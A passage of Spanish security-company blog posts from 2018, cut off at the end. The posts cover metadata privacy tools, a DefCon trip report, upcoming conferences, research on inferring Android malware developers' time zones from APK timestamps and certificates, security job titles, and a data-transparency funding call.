"Nos espían, nos escuchan...", como usuarios que utilizamos Internet a diario cada vez somos más conscientes del rastro que dejamos cuando navegamos y como nuestros movimientos generan información muy relevante para trazar un perfil impersonal de nuestros gustos y necesidades. Nuestras horas de conexión, búsquedas, número de perfiles en redes sociales, número de seguidores, retuits y un sinfín de parámetros más, son utilizados para encasillarnos en grupos y bases de datos que posteriormente tendrán (en muchos de sus casos), un uso comercial. Esta información, se obtiene de diferentes fuentes de las que el usuario medio no suele ser plenamente consciente, y los metadatos es una de las más utilizadas. En el este blog, ya hemos analizado anteriormente su importancia y como su uso sin control puede constituir un riesgo para la seguridad de una organización. Al fin y al cabo, son datos que se asocian de forma automática a casi cualquier tipo de documento y que, sin el control y tratamiento adecuado, pueden acabar derivando en incidentes de seguridad cuando salen de su ámbito interno y afectar por igual a usuarios y organizaciones públicas y privadas. Usando nuestra herramienta FOCA Open Source, desarrollamos una completa investigación en la que analizamos el nivel de madurez en los controles que utilizan entidades gubernamentales Latinoamericanas y el resultado fue que, una gran mayoría de estos organismos, no tenían un control riguroso sobre sus metadatos y por tanto, ponían en riesgo sus infraestructuras al “permitir” que delincuentes cibernéticos pudieran tener acceso a una gran cantidad de información sensible rastreando sus metadatos. Y esto ocurre a todos los niveles. Por ejemplo, al utilizar Twitter, generamos una gran cantidad de metadatos que revelan información sobre la geolocalización de un tuit, datos sobre nuestra cuenta, si está verificada o no, tuits marcados como favoritos etc. Según un estudio de la University College London titulado: "You are your Metadata: Identification and Obfuscation of Social Media Users" sus investigadores afirman que, únicamente a través de la información que logran extraer de los metadatos, son capaces de identificar a un usuario de la plataforma entre otros 10.000 con una precisión del 95 % . Y este ejemplo es extrapolable a la gran mayoría de las plataformas y software que utilizamos a diario. El “problema” de los metadatos radica en que, increíblemente, todavía se categorizan como información “no sensible”. Desde ElevenPaths ya os hemos hablado sobre Metashield, nuestra tecnología para analizar y limpiar metadatos que utilizamos en varios de nuestros productos con opciones Clean-up online, un cliente para Windows, tecnología interna de proyectos inminentes como Path8, o la FOCA y sus usos a través de ordenador, portátil, tablet y/o teléfono en el que los bots. analizan y muestran los metadatos, permitiendo, si se desea, limpiarlos. También te puede interesar: » Nuevas herramientas: Metashield Bots, analizando y limpiando metadatos para todos, desde cualquier parte » La doble moral de los metadatos. » Rastreando ubicaciones reales en los metadatos de las fotografías con FOCA » Metashield Analyzer - Descubre lo que ocultan realmente tus archivos
5 de septiembre de 2018
La experiencia de DefCon contada por un CSA
Durante la semana del 7 al el 12 de agosto, en Las Vegas, anualmente se celebran tres conferencias de seguridad de la información, que inician con BSides Las Vegas, seguida de Black Hat y se cierra con DefCon. Todas ellas brindan a los asistentes una vista diferente y complementaria de la seguridad, desde la comunidad hasta la vista empresarial y desde la parte técnica hasta la administrativa. Bsides Empecemos con BSides, cuyo eslogan es “ BSides Las Vegas no es una conferencia cualquiera, es una conferencia en la que todos somos participantes”. Por ello, está enfocada a la comunidad, así que su entrada es gratis y no tiene mucho patrocinio de la industria. La conferencia se divide en 10 escenarios orientados a diversas temáticas de seguridad de la información, siendo salas de aproximadamente 60 personas y charlas de 55 minutos de duración, con el objetivo de que sean muy interactivas y con contenidos muy práctico. El evento no tiene nada que envidiar a otras conferencias, el nivel técnico de las charlas es alto y la asistencia hace que se deba madrugar para obtener el badge que te permite estar en las salas de las conferencias. Black Hat Black Hat es la conferencia patrocinada por la industria, con un costo de USD2000 para tener un full-access y de USD600 para poder acceder a la zona de patrocinadores y a las charlas de la zona denominada Arsenal. Este evento ofrece entrenamientos por parte de la industria que inician desde el 4 de agosto y tienen costo dependiendo de cada entrenamiento. Este año la charla de inicio fue a cargo de Parisa Tabriz, directora de Google, quien enfocó su presentación en pedir a la audiencia que realice acciones más efectivas y no solo en esperar que suceden los incidentes. Después de esto iniciaron las charlas, que mostraron investigaciones de un sólido contenido técnico en una sala para unas 1000 personas. Por otro lado, cabe destacar la zona de patrocinadores, la cual es enorme y están los principales actores del mercado de la seguridad, en la parte técnica, mostrando y explicando el funcionamiento y las mejoras que se han implementado en los dispositivos. Esta área permite ver la evolución de la industria y cómo los fabricantes están evolucionando el hardware y software para la defensa de los ciberataques. DefCon Por último, esta DefCon, el evento que inició el jueves 9 y terminó el domingo 12. Compuesta por cuatro salas principales para las conferencias y 26 villas. Es, sin duda, el evento de seguridad de la información más grande repleta de retos, desde obtener el badge hasta poder asistir a la mayor cantidad de conferencias posibles. Al igual que BlackHat, las salas son enormes y las presentaciones tienen un alto nivel, tanto en el contenido técnico como en la capacidad de los expositores. En todas las presentaciones que pude acudir se toman tiempo en explicar las razones por las que se realiza cada investigación y muestran los resultados finales. Sin duda ver a mis compañeros Gabriel Bergel, Sergio de los Santos y Sheila Berta en sus presentaciones fue todo un orgullo y un gran momento. Por un lado, Gabriel mostró un gran proyecto en la villa de BioHacking para ayudar a personas con discapacidad en movilidad a tener libertad de movimiento. Y, por otro lado, la presentación de la investigación del laboratorio de ElevenPaths, “Rock Appround the Clock”, donde Sergio y Sheila, mostraron, no solo la capacidad de las investigaciones que se realizan sino la experiencia de nuestros research. Tras todo esto, resumo esta semana en una gran experiencia, donde se evidencia que la ciberseguridad esta ganando cada vez más adeptos y, donde las investigaciones y la industria demuestra que hay mucho camino por escribir y muchas cosas que se pueden mostrar.
31 de agosto de 2018
Eventos de seguridad informática en los que participamos durante el mes de septiembre
¿De vuelta de las vacaciones? En nuestro equipo estamos con las pilas cargadas para empezar un mes repleto de actividades, eventos y conferencias en seguridad informática, nuestros hackers no descansan, ¿Estás preparado?, ¡apunta tus favoritos! DragonJAR Security Conference Ya está aquí la V edición del DragonJAR Security Conference que se celebrará los próximos 8 y 9 de septiembre en el NH Royal Metrotel de Bogotá. Hackers hispanohablantes compartirán con todos los asistentes el conocimiento adquirido en sus proyectos de investigación en seguridad informática. Nuestro experto Pablo González expondrá sobre bypasses de UAC y el research de nuestra herramienta UAC-A-Mola. 8.8 Infinity La conferencia 8.8 Infinity es un evento 100 % técnico que tiene como principal objetivo compartir información, democratizar el conocimiento y crear comunidad en materia de seguridad. Participan los más destacados investigadores y expertos, que previamente han enviado sus artículos y son revisados por un Comité Académico formado por reconocidos hackers y académicos (PhD). Los artículos seleccionados se presentan en la conferencia. 8.8 Computer Security Conference. 8.8 Infinity Perú: el próximo 12 de septiembre, dos de nuestros CSAs, Claudio Caracciolo y Gabriel Bergel, expondrán en estas conferencias. El primero de ellos lo hará hablando sobre "The Bicho", y el segundo sobre "Cazadores de vulnerabilidades". 8.8 Infinity Bolivia: el 14 y 15 de septiembre, el CSA Gabriel Bergel volverá a particiapr en este evento, en esta ocasión en Bolivia. El tema a tratar será el mismo que en Perú: "Cazadores de vulnerabilidades". RootedCON Valencia El congreso de seguridad informática RootedCON nació con el propósito de promover el intercambio de conocimiento entre los miembros de la comunidad de seguridad, en particular reivindicando la enorme capacidad de los profesionales hispanoparlantes. Varios de nuestros expertos participarán en este congreso los días 14 y 15 de septiembre, en ADEIT Fundación Universidad-Empresa de la Universitat de Valencia. Pablo González y Fran Ramírez: el día 15 de septiembre con la ponencia sobre "Hidden Networks: ¿Controlas todas las redes de tu organización?". Pablo San Emeterio: el 15 de septiembre con la ponencia "Los 7 pecados capitales en el uso de dispositivos móviles". Además de esto, Pablo González repetirá ponencia durante la RootedLabs, hablando, en esta ocasión, sobre Metasploit & Hacking Ético., el día 14 de septiembre. BlockchainCON Expertos y líderes de Blockchain en las industrias más innovadoras se reunirán el 20 de septiembre en Madrid para hablar de los principales casos de éxito de aplicación de esta tecnología. También hablarán sobre sus mitos, los "talones de Aquiles", y de cómo abordarla en un espacio de debate muy exclusivo. Nuestra hacker y experta en esta materia, Yaiza Rubio, participará en este evento como speaker. ¡No os lo perdáis! SedianDAY SedianDAY reunirá a expertos y profesionales de la ciberseguridad con el objetivo de analizar los principales retos y claves para garantizar la seguridad de la información en el sector público. durante estas jornadas se hablará de todo lo relacionado con la seguridad digital en el sector público: ejemplos de buenas prácticas, últimas tendencias en el ámbito de la ciberseguridad y su aplicación a los retos a los que se enfrentan a diario las administraciones, principales riesgos y amenazas y cómo afrontarlos con las mejores soluciones tecnológicas. Una vez más, nuestra analista de inteligencia Yaiza Rubio participará en estas jornadas que se celebrarán el 26 de septiembre en Sevilla. ElevenPaths Talks: Detectando amenazas con inteligencia (Threat Intelligent) El próximo 6 de septiembre nuestros CSAs profundizarán en este webinar gratuito sobre el concepto de Threat Intelligent, qué herramientas se utilizan, la metodología y niveles de colaboración, y mucho más. Si quieres ser un experto de la detección de amenazas no te pierdas este #11PathsTalks. Code Talks for Devs: 'WordPress' in Paranoid Mode El experto Pablo González nos habla sobre WordPress, el CMS más utilizado del mundo. A su vez, detallaremos la investigación realizada por nuestros expertos sobre cómo fortificar un sistema WordPress. ¡Aprende sobre ciberseguridad el 19 de septiembre! Y esto es todo por este mes hackers, os esperamos el mes que viene con más eventos y conferencias. Recordad que si tenéis cualquier duda sobre seguridad informática, podéis acceder a la comunidad de ElevenPaths y preguntar a nuestros expertos. ¡Buen fin de semana a todos!
30 de agosto de 2018
Rock Appround the Clock, la investigación presentada en DefCON
En el mundo del Threat Intelligence, determinar la localización geográfica del atacante es uno de los datos más valorados en las técnicas de atribución. Incluso si no es percibida como tal, esta información puede conducir una investigación en un sentido u otro. De dónde viene el autor, dónde vive o dónde se situaba el sistema en el momento del ataque, puede ser una información de gran valor en el juego de la atribución. Hemos focalizado la investigación en cómo aprovechar estos problemas de “zona horaria” para perseguir a desarrolladores de malware para Android. Describimos dos formas efectivas para averiguar la zona horaria del atacante. También hemos calculado si estas circunstancias tienen relación real con el malware, investigando en nuestra base de datos de 10 millones de APKs. AAPT time zone disclosure bug El Android app development kit (SDK para Android) viene con una herramienta llamada “aapt”. Este programa empaqueta los ficheros que van a componer la aplicación y genera el fichero .APK que fundamentalmente se corresponde con el formato zip. Si la herramienta aapt se utiliza directamente por línea de comando o quizás a través de un plugin fuera de Android Studio, los ficheros que componen el APK serán generado con una fecha que seguirá el siguiente formato: 1980-01-01 [offset_GMT]:00:00. Donde [offset_GMT] representa la zona horaria que corresponde con la configuración del Sistema operativo donde ha sido empaquetada. Esta figura representa un .APK muy simple generado por línea de comandos con aapt en un sistema con zona horaria configurada en GMT +3. Offset GMT in the modified time field Como se aprecia, la hora de modificación en los ficheros es 01-01-80 y “03:00”, que corresponde al GMT +3. Observamos este caso en diferentes aplicaciones reales y con zonas horarias. ¿Por qué? Durante el proceso en el que aapt añade un fichero al .APK, ( ZipFile.cpp – line 358), se observa en la línea 500 una llamada a “setModWhen”, usando la variable “modWhen” como argumento. Calling setModWhen in aapt source code Pero, yendo hacia atrás en el código, no existe ninguna parte en la que “modWhen” obtenga un valor útil. Siempre vale “0” desde que inicialmente en la línea 367 se inicializa. ( ZipFile.cpp – line 367): Setting modWhen in aapt code Normal 0 21 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Tabla normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:8.0pt; mso-para-margin-left:0cm; line-height:107%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri",sans-serif; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-ansi-language:EN-US; mso-fareast-language:EN-US;} Por tanto, setModWhen se llamará siempre de esta manera: pEntry->setModWhen (0); Dentro de esta función ( ZipEntry.cpp – line 340), la variable modWhen se usa en la línea 351 como parte de esta operación: even = (time_t)(((unsigned long) (when) + 1) & (~1)); Que será llamada de esta forma, teniendo en cuenta el valor de “modWhen”: even = (time_t)(((unsigned long) (0) + 1) & (~1)); El resultado será, obviamente, “0”. Este valor se almacenará en la variable “even” que se utilizará más tarde como argumento para la función “localtime” del sistema. Esta función permte crear la estructura para la echa “tm * ptm” y será usado para establecer la fecha y hora del campo, fecha en los ficheros añadidos al propio APK. setModWhen function inside aapt source code. Normal 0 21 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Tabla normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:8.0pt; mso-para-margin-left:0cm; line-height:107%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri",sans-serif; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-ansi-language:EN-US; mso-fareast-language:EN-US;} Debido a que este timestamp (variable “even”) utilizado como argumento para localtime no es válido, la fecha generada para los ficheros al final no es válida, sino que vale también 0. Existe una corrección para los años (porque en format PKzip la fecha inicial es el 1 de enero de 1980, no el 1 de enero de 1970) y finalmente, la función devuelve el formato descrito: “01-01-80 [offset_GMT]:00:00”. En tiempo de ejecución, esta figura muestra cómo “even” vale 0 justo antes de que la función localtime reciba el argumento. Variable “even” in runtime Normal 0 21 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Tabla normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:8.0pt; mso-para-margin-left:0cm; line-height:107%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri",sans-serif; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-ansi-language:EN-US; mso-fareast-language:EN-US;} El código continua y ahora divide el dato ( day, month, year, hours, minutes y seconds) para ser utilizados por separado (en la impresión por pantalla, por ejemplo). La forma en la que localtime devuelve el resultado es: seconds, minutes, hours, day, month, y year. Esto es, por ejemplo, que en la posición primera (0x006A0E10) encontrarás 4 bytes para los segundos, y en la última (0x006A0E24) cuatro para el año. Result from localtime function as in memory Normal 0 21 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Tabla normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:8.0pt; mso-para-margin-left:0cm; line-height:107%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri",sans-serif; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-ansi-language:EN-US; mso-fareast-language:EN-US;} Siguiendo los colores en la figura, la información devuelta sería: Con esto se concluye qué es la función localtime del sistema la que devuelve este offset (en este caso: +3), tomando este valor del sistema operativo. Aapt después redondeará el año a 01-01-80. La función localtime intentará adaptar cada fecha para la zona en la que el sistema se supone que está configurado. Si nos fijamos en la documentación de la función localtime esto no debería pasar porque se especifica que si la función toma un valor 0 o null como argumento, el valor devuelto debería ser null. ¿En qué momento l ocaltime toma el valor GMT y lo devuelve? Para los sistemas Windows, por ejemplo, la variable TZ (timezone) si no está aplicada en la propia aplicación, la función localtime intentará extraer la zona información de la zona horaria del sistema y la función irá a buscarlo cuando reciba cualquier valor, real o no como argumento. Un valor de timestamp inválido como “null” o “0”, se tomará como la hora “0” y lo que se devuelva contendrá el valor del desplazamiento GMT, que acaba donde debería ir la hora. En UNIX/Linux también se da esta particularidad. Si un desarrollador utiliza appt por línea de comando, el desplazamiento GMT para su zona horaria será añadido a la fecha de modificación de dentro del APK. Centrándonos en el código fuente de aapt, la función setModWhen utiliza localtime_r en vez de localtime (el código es el mismo, solo depende del sistema operativo donde se ejecute), pero el argumento que se le pasa sigue siendo la variable “even” (con un valor de 0). Esta función es básicamente igual que en Windows, pero no existe el concepto de variable TZ para decidir: siempre se añadirá la zona horaria establecida en el sistema operativo. ¿Qué podemos concluir entonces? Localtime no está manejando los errores como debería. Al recibir un argumento 0 o null, debería devolver null, no un 0 más cualquier GMT configurado (TZ en el caso de Windows) añadido al valor. Por otro lado, aapt comete el error de usar el 0 como argumento “constante” para alimentar esta función. GMT zone certificate calculation Como se ha dicho, los ficheros .APK (y los .jar, para esta técnica en particular) siguen el estándar PKZIP. Esto es que son, en realidad, ficheros .zip que comparten la mayoría de las especificaciones PKZIP. En el caso en el que el APK se construya sin utilizar directamente aapt, habrá bastantes posibilidades de que los campos de fecha de modificación de los ficheros dentro del ZIP sean los correctos y no podamos aplicar la técnica descrita anteriormente. Sin embargo, hace algunos años, encontramos otro método que nos permitiría conocer la zona horaria donde el desarrollador compiló la aplicación, que podría ser utilizado como complementario al anterior. El método se basa en calcular la diferencia entre la fecha de los ficheros, y la fecha del certificado creado en el momento para firmarlo (esta fecha se almacena en formato UTC standard, de ahí que tenga referencias suficientes para calcular el huso horario). UTC Time - ZIPs file gets the offset and thus, time zone (map from timeanddate.com). Normal 0 21 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Tabla normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:8.0pt; mso-para-margin-left:0cm; line-height:107%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri",sans-serif; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-ansi-language:EN-US; mso-fareast-language:EN-US;} Relación con el malware Hemos intentado establecer una relación entre: Creadores de malware y adware, y la forma en la que compilan sus APKs (usando aapt por línea de comando). Creadores de malware y adware, y la forma en la que utilizan certificados ad-hoc o desechables. Para este experimento, tomamos 1000 ficheros (a menos que se indique lo contrario) de cada una que filtrase en cada zona horaria (1000 ficheros filtrando GMT+1, 1000 filtrando GMT+2… etc.) y buscamos malware en ellos. con el bug de AAPT: Las columnas en verde no son representativas por existir muy pocas muestras. Revelación por certificado desechable: Así que podemos concluir que básicamente, GMT+4, GMT+5, GMT+8, GMT-6 y GMT-7 son las zonas horarias que producen más malware. ¿Por qué esta diferencia entre técnicas? Por ejemplo, con la primera fórmula las zonas horarias predominantes en malware son: GMT+4, GMT+8 and GMT-7. Con la técnica que involucre el certificado, GMT+5, GMT+8 and GMT-6 son las que producen más malware. Estos GMTs corresponden a partes de Rusia, China y la costa Oeste de Estados Unidos. Pensamos que esta diferencia se debe a Daylight Saving Time. Estas técnicas están sujetas al DST, por lo que varios países pueden tener +1 hora de diferencia dependiendo de la estación del año. China no utiliza DST (ni Rusia desde hace algunos años). Además, sabemos que nuestra base de datos contiene un 6 % de malware en cualquier conjunto que tomemos. Si utilizamos esto como factor de corrección para comparar, finalmente obtenemos estos números: Metadatos Como una de las técnicas relacionadas con metadatos, mostramos cómo todas las cadenas automáticamente generadas con Android Studio están en componentes específicos creados por el propio IDE, mientras que las cadenas escritas por el propio desarrollador se encuentran en otros ficheros no asociados a ningún componente. Así, por ejemplo, al ejecutar: ./aapt dump --values resources app.APK | grep '^ *resource.*:string/' --after-context=1 > output.txt Extracting all the resources of an Android application, filtering by text strings. Normal 0 21 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Tabla normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:8.0pt; mso-para-margin-left:0cm; line-height:107%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri",sans-serif; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-ansi-language:EN-US; mso-fareast-language:EN-US;} Obtenemos las frases escritas por el propio desarrollador que, muy probablemente se encuentren en su idioma natal. Conclusiones y trabajo futuro Hemos presentado dos técnicas diferentes y complementarias que permiten conocer el huso horario de dónde se compiló una aplicación. Una de ellas, relacionada con aapt, no solo muestra un fallo en la forma en la que maneja las fechas, sino además un posible problema en la función de sistema localtime que no sigue las especificaciones. Esto podría afectar a otros programas de otras formas. Estudiando estas técnicas, disponemos de una nueva fórmula para detectar malware creado de forma automática, analizando cómo y cuándo se crean los certificados para firmar estas apps. Además de las estadísticas para saber de dónde viene el malware a través del análisis de sus zonas horarias, esto podría ser utilizado como una importante funcionalidad de las técnicas de machine learning para una detección temprana del malware. Además, hemos mostrado algunas herramientas para ver de un vistazo el resultado de aplicar estas técnicas y trucos y obtener información relevante a través de toda esta metainformación. En un trabajo futuro, deberíamos abordar el hecho de ser más precisos con el DST, teniendo en cuenta la estación del año para clasificar el malware, e incluso añadir más muestras para obtener mejores conclusiones.
28 de agosto de 2018
Principales terminologías de perfiles en seguridad digital
¿Sabes qué perfiles son los más útiles para garantizar la seguridad de tu empresa? Hoy en día, cualquier organización, por pequeña o grande que sea, se encuentra en pleno proceso de transición hacia un mundo cada vez más digital. Esta digitalización a la que nos enfrentamos y que afecta, no sólo a entornos empresariales, sino también a otros ámbitos de nuestra vida, se plasma de manera muy evidente en la creación y demanda de nuevos puestos laborales que tienen que ver, precisamente, con la protección de estos entornos digitales en los que cada día nos sumergimos. Algunas empresas, conscientes y preocupadas por el gran aumento de amenazas que afectan a sus procesos de transformación digital, confían en la ciberseguridad como mejor aliado ante los riesgos y efectos de dichas amenazas. Algunas de las últimas cifras argumentan esta preocupación: para el año 2020 se estima que los incidentes de seguridad relativos a brechas de información supondrán un coste global superior a los 2 trillones de dólares. Aun así, son muchas las empresas que todavía desconocen los problemas a los que podrían enfrentarse de no contar entre sus filas con profesionales de seguridad cualificados. Desde nuestro blog, insistimos en la importancia de estar preparado contra estas ciberamenazas, mostrando la complejidad de esta lucha y las diferentes capacidades reactivas que se deben adoptar. Tal es la necesidad, que las empresas deben incorporar procesos de actuación a diferentes niveles y con responsabilidades muy diferentes, como muestra, queremos hablaros hoy de cuáles son los perfiles profesionales que más nos ayudan desde ElevenPaths en nuestra lucha contra las amenazas en seguridad digital. CEO (Chief Executive Officer): es el máximo responsable de la gestión y dirección administrativa de la empresa, es decir, el director ejecutivo. Es la persona encargada de formular el objetivo, la visión y misión de la compañía. CSO (Chief Security Officer): es la persona responsable de toda la seguridad interna de la organización. Tiene que estar continuamente al tanto de todos los riesgos en ciberseguridad y conocer de primera mano la normativa, establecer los planes de continuidad, tener una visión completa del negocio, etc. Podemos pensar que el CISO y el CSO son el mismo rol y que desempeñan las mismas funciones. En organizaciones pequeñas es frecuente que coincidan ambas responsabilidades en una misma persona. Pero realmente no es así. El rol del CISO suele estar más centrado en aspectos de seguridad de la información, y cuando existen CSO y CISO, el CISO reporta al CSO y el CSO a la dirección. CIO (Chief Information Officer): es el responsable de los sistemas de tecnologías de la información de la empresa a nivel de procesos y desde el punto de vista de la planificación. El CIO analiza qué beneficios puede sacar la empresa de las nuevas tecnologías, identifica cuales de estos pueden interesar más a la compañía y evalúa su funcionamiento. CISO (Chief Information Security Officer): es el encargado de alinear los objetivos principales de la empresa con la estrategia de ciberseguridad. Además de esto, se encarga de establecer las políticas de seguridad de la organización en función de la actividad de la misma y de establecer las medidas y controles necesarios. CTO (Chief Technology Officer): este perfil es el responsable del equipo de ingeniería y encargado del funcionamiento de los sistemas de información. La diferencia con el CIO es que éste se preocupa de incrementar la eficiencia para mejorar el flujo de trabajo de la comunicación, mientras que el CTO se centra en la estrategia tecnológica. DPO (Data Protection Officer): esta figura se ocupa de los asuntos sobre privacidad y protección de datos, es decir, el responsable de la privacidad que, con una actuación preventiva y activa, se encarga de coordinar, supervisar y transmitir la política de protección de datos dentro y fuera de la entidad. Este perfil es obligatorio para aquellas empresas o entidades que procesen información personal de usuarios tal y como estipula la vigente GDPR. CSA (Chief Security Ambassador): este puesto gestado específicamente en ElevenPaths fue creado para promover, difundir y concienciar sobre aspectos relativos a la ciberseguridad, exponiendo a las empresas la necesidad de estar preparadas y también mostrando las diferentes capacidades que deben incorporar para afrontar los numerosos riesgos y amenazas que las acechan. Analista de seguridad: son los individuos que están en los equipos de monitorización del SOC, revisando eventos de seguridad y alertas, realizando un análisis de las mismas, y cuando aplica, escalando las alertas que resultan incidentes a los especialistas de "incidencias". Es decir, están en constante detección de cualquier posible vulnerabilidad técnica en los sistemas informáticos y redes de la compañía. Arquitecto de seguridad: es el responsable de asegurar todos los desarrollos que se realicen en el entorno y la organización, para ello, previamente diseña la arquitectura de ciberseguridad. Hacker ético/ pentester: este perfil debe de estar muy al día de todas las amenazas que hay en la actualidad en el mundo digital, además de conocer de primera mano las técnicas que utilizan los ciberdelincuentes para poder poner a prueba los sistemas de seguridad de las empresas y analizar los peligros a los que se afrontan y de esta manera ponerles remedio. Su labor principal consiste en identificar agujeros/vulnerabilidades, "atacarlos" de forma segura para ver si son explotables, y proponer las recomendaciones para su parcheo/remediación. Especialista forense: es el encargado de realizar un análisis detallado de las redes y sistemas tras sufrir un incidente de seguridad o ciberataque. Especialista en incidencias: cuando se produce un ataque de seguridad, es el responsable de coordinar las actividades que se deben de realizar para solventar este ataque. Activará el plan de control para que todos los equipos trabajen alineados y las incidencias sufridas tengan el menor impacto posible. Analista de inteligencia y hunters: son equipos que investigan inteligencia procedente de fuentes externas y se infiltran e interactúan con atacantes dark sites y comunidades Deep web para extraer inteligencia sobre nuevas técnicas de ataque, nuevos actores... Con toda esta inteligencia, hacen dos cosas: por un lado, proactivamente buscan signos de compromiso sobre la infraestructura para identificar ataques en curso que hubieran podido pasar desapercibidos por la compañía (Ejemplo: que hubieran evadido el antivirus, IDS, anti-spam..), y por otro lado, se coordinan con el C-level (CISO…) para adaptar nuevas defensas y controles de seguridad (Ejemplo: nuevo ataque utiliza esta vulnerabilidad X, pues voy a asegurarme que todos mis equipos estén correctamente parcheados). Network defenders" o responsables de red: se encargan de configurar los sistemas de red, añadir nuevas reglas para bloquear trafico o permitir tráfico, etc. Además de esto, configuran el tráfico DNS, los proxies de navegación, los firewalls, los sistemas IDS/IPS para detección y bloqueo de anomalías, y mucho más.
14 de agosto de 2018
El Data Transparency Lab busca nuevos proyectos sobre privacidad y transparencia de datos
DTL lanza una convocatoria entre el 10 de agosto y el 30 de septiembre para atraer nuevas aplicaciones Los seleccionados recibirán premios de entre 10.000€ y 25.000€ para finalizar su aplicación El DTL presentará los proyectos ganadores en su evento anual que se celebrará en Barcelona el próximo 25 de noviembre. El Data Transparency Lab (DTL) lanza el próximo 10 de agosto una convocatoria de herramientas para que emprendedores, startups, universidades y centros de investigación presenten nuevos proyectos sobre privacidad y transparencia de datos. El objetivo de la convocatoria es dar apoyo económico y técnico para ayudar a finalizar aplicaciones, herramientas, librerías y otras formas de software alineadas con la misión del DTL que busca ayudar a los usuarios a saber cómo se usan sus datos cuando se conectan a servicios online: qué datos se recopilan, quién los recopila y cómo se usan. En la presente convocatoria se otorgarán hasta 50.000€ en ayudas y el número de premios dependerá de los importes solicitados por los proyectos finalistas. Cada participante podrá decidir el importe que necesita para finalizar su proyecto, entre 10.000€ y 25.000€ como máximo. Además de la ayuda económica, los proyectos seleccionados recibirán apoyo técnico por parte de un mentor de Telefónica, con quién establecerán un acuerdo de trabajo para supervisar el desarrollo de la herramienta y garantizar el buen progreso del proyecto. ¡INSCRÍBETE AQUÍ! Acceso a la convocatoria Para poder acceder a estas ayudas, los proyectos deberán registrarse a través del formulario de la web del DTL. El pe riodo de inscripción comienza el 10 de agosto y finalizará el 30 de septiembre. El comité de selección valorará los proyectos y dará a conocer a los ganadores en el evento anual de DTL del próximo 15 de noviembre, cuando se reúnan en Barcelona los mejores investigadores, tecnólogos, legisladores y representantes de la industria para poner en común los avances en este campo a nivel internacional. Las principales áreas de interés en las que pueden estar centradas los proyectos que se presenten son la detección de filtraciones de privacidad, transparencia publicitaria, valoración de datos personales, técnicas de análisis de rastreo, discriminación de precios en función de la información personal, discriminaciones por sesgo algorítmico, identificación y análisis de prácticas anticompetitivas, detección y análisis de segmentación publicitaria por comportamiento, búsqueda, recomendación y retos de transparencia sobre criptomonedas y tecnologías blockchain e Inteligencia Artificial, entre otras. Sobre DTL El Data Transparency Lab, creado e impulsado por Telefónica, es un proyecto que nació hace cuatro años en el Centro de I+D de Barcelona y es un claro ejemplo del esfuerzo en innovación que Telefónica desarrolla en la ciudad. Surgió como respuesta a la necesidad detectada de investigar en el campo de la transparencia en el uso de los datos en el entorno digital y se ha consolidado como un organismo referente en su sector. DTL reúne a los mejores tecnólogos, legisladores, representantes de la industria e investigadores del mundo para trabajar en la mejora de la transparencia y privacidad de los datos personales. El objetivo del DTL es conectar el mejor talento del mundo para ponerlo 